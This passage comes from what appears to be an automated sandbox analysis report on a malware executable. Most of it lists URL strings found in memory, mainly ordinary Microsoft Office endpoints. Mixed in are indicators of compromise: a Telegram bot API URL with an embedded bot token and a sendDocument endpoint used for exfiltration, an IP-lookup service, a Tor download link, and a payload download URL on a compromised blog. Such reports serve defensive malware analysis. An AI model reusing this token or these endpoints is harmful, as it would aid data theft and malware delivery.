Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.497115569.0000000005C43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cna
Source: PROMZwFp385vXrN.exe, 00000011.00000002.628798614.0000000003332000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://wz5PFqmQeks9Nrk59.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgappdataPMoZbwPMoZbw.exe/http://YJEXbs.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.office.net
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://api.scheduler.
Source: PROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/
Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/1673982758%discordapi%yyy
Source: PROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/sendDocument
Source: PROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org4
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://augloop.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://cdn.entity.
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://cortana.ai
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://cr.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://directory.services.
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://graph.windows.net
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://invites.office.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://login.windows.local
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://management.azure.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://management.azure.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://messaging.action.office.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://osi.office.net
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://outlook.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://pushchannel.1drv.ms
Source: ~WRS{1FCF93C7-36B2-4597-9FFA-7A18301AC743}.tmp.0.dr	String found in binary or memory: https://pzsrblog.com/wp-content/uploads/2012/PROMZwFp385vXr
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://tasks.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: pzsrblog.com

